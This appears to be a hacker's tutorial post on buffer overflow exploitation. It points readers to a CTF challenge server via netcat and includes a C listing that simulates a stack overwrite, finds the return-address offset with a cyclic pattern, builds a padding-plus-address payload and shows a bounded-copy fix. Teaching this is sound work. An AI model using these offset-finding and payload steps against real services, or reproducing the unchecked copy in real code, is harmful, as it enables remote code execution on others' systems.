Today's exploit video will feature something that has been heavily requested by many of my followers: binary injection, more commonly called binary exploitation, in its classic form, the buffer overflow exploit.
I'll be discussing the following topics in order: Premise, and What is binary injection? You can click on any of the topics to jump straight to the one that interests you.
Here's a quick rundown of the main links in the article in case you want to check them out first: LinkedIn Version, Patreon Version.
Much like SQL injection, binary injection is hard to learn without proper instruction. What I'm going to show you today is the overall premise and the concept behind the technique. This is the definitive example and the easiest way to explain how binary injection works to anyone who wants to learn more about it.
Binary exploitation is one of the hardest techniques to learn and master, mostly because there are few good resources that teach it well.
I'm also going to write some sample code in C that is vulnerable to a buffer overflow, so that you can play with it and get a feel for how the attack works at a technical level. This also sets us up for the next part, where I cover how to use a debugger to analyze the code flow and perform the exploit the manual way. There are more special surprises for binary injection coming up, so stay tuned.
As always, any videos included with this article are for paid members only. You can check out my tiers and pricing through the Patreon link in the comment section below, as well as on my website.
There are situations where a server exposes a native program as a network service bound to a port (web application servers are a common place to find one). When you connect to it, the program runs, and in some cases it asks you for user input, which is perfectly normal. You can fuzz that input the way I showed you in previous examples and trigger a segmentation fault. The crash tells you the program wrote past the end of a buffer; if what got overwritten includes the saved return address, you can turn that into RCE against the server-side application, and having the source code (or the binary itself) makes it much easier because you can work out the exact offsets.
To give you a better idea of what I mean, run the following command: nc canyouhack.us 1985
This is a challenge from Security Innovation, which hosts the canyouhack.us challenge server, a binary exploitation target that is legal to test against. Look it up before you run the command.
Next, if you send it some input you'll notice the connection closes. You can't see the server's own output for the crash (the service only returns what the program writes to the socket), but the site gives you the source code for the challenge, which you can compile and test against locally. There are vulnerable sections in the code that can be exploited to make the program send you the flag and solve the challenge. The payload has to be piped over the nc connection, which you can do with a small script or any tool that writes raw bytes to stdout.
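The whole sequence above (send input, crash it, work out what overwrote the return address, then send a payload) in miniature, as an added example that is not the article's code and not the canyouhack.us challenge's code. It models an x86-64 stack frame inside a byte array so the overwrite can be inspected without crashing the process; the frame sizes, the address constants and the function names are assumptions chosen for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed layout: 64-byte local buffer, then the saved frame pointer and
 * the saved return address (8 bytes each, as on x86-64). Real frames
 * depend on the compiler, its options and alignment. */
#define BUF_SIZE      64
#define SAVED_RET_OFF (BUF_SIZE + 8)
#define FRAME_SIZE    (BUF_SIZE + 16)
#define ORIG_RET      0x4011d6ULL   /* made-up "return into caller" address */

static void store_le64(unsigned char *p, uint64_t v)
{
    for (int k = 0; k < 8; k++) p[k] = (unsigned char)(v >> (8 * k));
}

static uint64_t load_le64(const unsigned char *p)
{
    uint64_t v = 0;
    for (int k = 0; k < 8; k++) v |= (uint64_t)p[k] << (8 * k);
    return v;
}

/* The bug: a strcpy/gets-style copy that trusts the input length, so bytes
 * past BUF_SIZE spill into the saved frame pointer and return address.
 * The copy is capped at FRAME_SIZE only so this demo cannot smash its own
 * stack; a real strcpy has no cap. Returns what now sits in the
 * return-address slot, i.e. where `ret` would jump. */
uint64_t vulnerable_copy(const unsigned char *input, size_t len)
{
    unsigned char frame[FRAME_SIZE];
    memset(frame, 0, sizeof frame);
    store_le64(frame + SAVED_RET_OFF, ORIG_RET);

    size_t n = len < FRAME_SIZE ? len : FRAME_SIZE;
    memcpy(frame, input, n);                 /* no check against BUF_SIZE */

    return load_le64(frame + SAVED_RET_OFF);
}

/* The fix: a bounded copy that rejects input that does not fit (including
 * the terminating NUL) instead of silently overwriting the frame. */
int safe_copy(char *dst, size_t cap, const char *src)
{
    size_t n = strlen(src);
    if (n >= cap) return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Metasploit-style cyclic pattern (Aa0Aa1...Ab0...): every window of 4 or
 * more bytes is unique within the first 20280 bytes, so whatever lands in
 * the return address identifies its own offset. */
size_t cyclic_pattern(unsigned char *out, size_t n)
{
    size_t i = 0;
    for (char a = 'A'; a <= 'Z' && i < n; a++)
        for (char b = 'a'; b <= 'z' && i < n; b++)
            for (char c = '0'; c <= '9' && i < n; c++) {
                const char grp[3] = { a, b, c };
                for (int k = 0; k < 3 && i < n; k++) out[i++] = (unsigned char)grp[k];
            }
    return i;
}

/* Map the bytes seen in the clobbered return address back to their offset
 * in the pattern; -1 if they did not come from the pattern. */
long cyclic_find(const unsigned char *seen, size_t slen)
{
    static unsigned char pat[26 * 26 * 10 * 3];
    size_t plen = cyclic_pattern(pat, sizeof pat);
    for (size_t i = 0; i + slen <= plen; i++)
        if (memcmp(pat + i, seen, slen) == 0) return (long)i;
    return -1;
}

/* The fuzzing step: send a pattern longer than the buffer, observe what
 * overwrote the return address, and recover the offset (72 here). */
long find_ret_offset(void)
{
    unsigned char pat[200], seen[8];
    size_t n = cyclic_pattern(pat, sizeof pat);
    store_le64(seen, vulnerable_copy(pat, n));
    return cyclic_find(seen, sizeof seen);
}

/* The real payload: `offset` bytes of padding, then the address we want
 * `ret` to use, little-endian. Returns its length, or 0 if cap is too small. */
size_t build_payload(unsigned char *out, size_t cap, size_t offset, uint64_t target)
{
    if (cap < offset + 8) return 0;
    memset(out, 'A', offset);
    store_le64(out + offset, target);
    return offset + 8;
}

int main(void)
{
    long off = find_ret_offset();
    unsigned char payload[128];
    size_t len = build_payload(payload, sizeof payload, (size_t)off, 0x401136ULL);
    printf("offset %ld, ret slot after payload = 0x%llx\n", off,
           (unsigned long long)vulnerable_copy(payload, len));
    return 0;
}
```

Against a real service the payload bytes would be written to stdout and piped into nc exactly as described above; the offset-finding step is what the debugger part of this series does by reading the crashed process's registers instead of a simulated slot.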
If you'd like to see the more advanced version of this article, which covers methods that can be used to mitigate this attack, as well as any included videos, subscribe to my Patreon cyber security tier!
If you enjoyed this post, give it a thumbs up! I'll be keeping track of who's reacting from now on, as there is a "special" reason for it. Just know that the more you support my content, the more there is in store!
- The Hacker Who Laughs